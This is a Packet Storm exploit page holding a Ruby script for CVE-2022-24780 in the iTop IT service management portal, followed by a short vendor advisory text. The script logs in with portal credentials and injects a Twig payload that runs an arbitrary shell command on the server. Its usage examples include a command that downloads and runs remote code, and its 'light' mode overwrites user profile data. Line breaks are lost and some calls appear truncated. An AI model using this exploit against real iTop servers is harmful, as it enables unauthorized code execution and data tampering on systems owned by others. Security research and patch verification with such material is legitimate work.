

iTop Remote Command Execution

iTop versions prior to 2.7.5 authenticated remote command execution exploit.

Packet Storm
#!/usr/bin/env ruby# Exploit## Title: iTop < 2.7.6 - (Authenticated) Remote command execution## Exploit author: noraj (Alexandre ZANNI) for ACCEIS ( Author website: Exploit source: Date: 2022-05-20## Vendor Homepage: Software Link: Version: 2.x < 2.7.6 and 3.x.x-beta < 3.0.0## Tested on: iTop version 2.7.4 (Ubuntu 18.04.4 LTS - 7.3.28)# Vulnerability## Discoverer: Markus KRELL## Date: 2021-10-04## Discoverer website: Discovered on iTop 2.7.4-7194 and 3.0.0-beta-7312## Title: Server-Side Template Injection inside customer Portal## CVE: CVE-2022-24780## CWE: CWE-94, CWE-1336## Patch:##   -   -   - References:##   -   -   - 'httpx'require 'docopt'require 'nokogiri'doc = <<~DOCOPT  iTop < 2.7.6 - (Authenticated) Remote command execution  Usage:    #{__FILE__} full <url> <username> <password> <cmd> [--debug]    #{__FILE__} light <url> <username> <password> <cmd> [--debug]    #{__FILE__} -h | --help    full: exploit with an emulated browser, execute JavaScript, preserve original user profile information    light: just parse HTML and send requests, no JavaScript, (DESTRUCTIVE) reset user information: phone, location, function  Options:    <url>       Root URL (base path) including HTTP scheme, port and root folder    <username>  iTop portal username    <password>  iTop portal user password    <cmd>       Command to execute on the target    --debug     Display arguments    -h, --help  Show this screen  Examples:    #{__FILE__} full john 's9nvEIZnEo6ghi' 'echo proof > /var/www/html/proof.txt'    #{__FILE__} light john 's9nvEIZnEo6ghi' 'curl --remote-name; perl'DOCOPTdef login(root_url, user, pass, http)  login_url = "#{root_url}/pages/UI.php"  params = {    'auth_user' => user,    'auth_pwd' => pass,    'login_mode' => 'form',    'loginop' => 'login'  }, form: params).body.to_senddef login_watir(root_url, user, pass, browser)  login_url = "#{root_url}/pages/UI.php"  browser.goto login_url  browser.text_field(id: 'user').set(user)  browser.text_field(id: 'pwd').set(pass)  browser.button(value: 'Enter iTop').clickenddef fetch_form(root_url, http)  profile_url = "#{root_url}/pages/exec.php/user?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal"  # Fetch and parse HTML document  doc = Nokogiri.HTML5(http.get(profile_url).body.to_s)  action = doc.css('form').first['action']  transaction_id = doc.css('input[name="transaction_id"]').first['value']  form_id = doc.css('form').first['id']  # doesn't work because it's populated with javascript, we'll need watir for that  #phone = doc.css('input[id^=field_phone]').first['value']  #location = doc.css('select[id^=field_location_id] option[selected]').first['value']  #function = doc.css('input[id^=field_function]').first['value']  return {action: action, tid: transaction_id, fid: form_id}enddef exploit(root_url, cmd, http, browser)  form_data = fetch_form(root_url, http)  vuln_url = "#{root_url}#{form_data[:action]}"  user_info = browser.nil? ? {phone: '', location: '', function: ''} : fetch_form_js(root_url, browser)  params = {    'operation' => 'submit',    'stimulus_code' => '',    'transaction_id' => form_data[:tid],    # source data already escapes backslashes and double quotes for JSON    # so \ -> \\ and " -> \"    # but we need to esacpe backslash once for Ruby too because we need an interpolated string    # so \ -> \\ -> \\\\ and " -> \\"    'formmanager_class' => 'Combodo\iTop\Portal\Form\ObjectFormManager',    'formmanager_data' => %Q^{"id":"#{form_data[:fid]}","transaction_id":"#{form_data[:tid]}","formmanager_class":"Combodo\\\\iTop\\\\Portal\\\\Form\\\\ObjectFormManager","formrenderer_class":"Combodo\\\\iTop\\\\Renderer\\\\Bootstrap\\\\BsFormRenderer","formrenderer_endpoint":"#{form_data[:action]}","formobject_class":"Person","formobject_id":"1","formmode":"edit","formactionrulestoken":"","formproperties":{"id":"default-user-profile","type":"custom_list","fields":[],"layout":{"type":"twig","content":"<!-- data-field-id attribute must be an attribute code of the class --><!-- data-field-flags attribute contains flags among read_only/hidden/mandatory/must_prompt/must_change --><div class=\\"form_field\\" data-field-id=\\"first_name{{['#{cmd}']|filter('system')}}\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"name\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"org_id\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"email\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"phone\\"></div><div class=\\"form_field\\" data-field-id=\\"location_id\\"></div><div class=\\"form_field\\" data-field-id=\\"function\\"></div><div class=\\"form_field\\" data-field-id=\\"manager_id\\" data-field-flags=\\"read_only\\"></div>"}}}^,    'current_values[phone]' => user_info[:phone],    'current_values[location_id]' => user_info[:location],    'current_values[function]' => user_info[:function]  }, form: params).body.to_senddef fetch_form_js(root_url, browser)  # those values can't be fetched with nokogiri alone sicne they are populated using javascript  profile_url = "#{root_url}/pages/exec.php/user?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal"  browser.goto profile_url  phone = browser.text_field(name: 'phone').value  location = 'location_id').selected_options.first.value  function = browser.text_field(name: 'function').value  return {phone: phone, location: location, function: function}endbegin  args = Docopt.docopt(doc)  pp args if args['--debug']  http = HTTPX.plugin(:cookies)  login(args['<url>'], args['<username>'], args['<password>'], http)  if args['full']    require 'watir'    require 'webdrivers'    b = :firefox    login_watir(args['<url>'], args['<username>'], args['<password>'], b)  elsif args['light']    b = nil  end  exploit(args['<url>'], args['<cmd>'], http, b)rescue Docopt::Exit => e  puts e.messageend

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CVE-2022-24780: N°4384 Security hardening · Combodo/iTop@b6fac4b

Combodo iTop is a web based IT Service Management tool. In versions prior to 2.7.6 and 3.0.0, users of the iTop user portal can send TWIG code to the server by forging specific http queries, and execute arbitrary code on the server using http server user privileges. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds.

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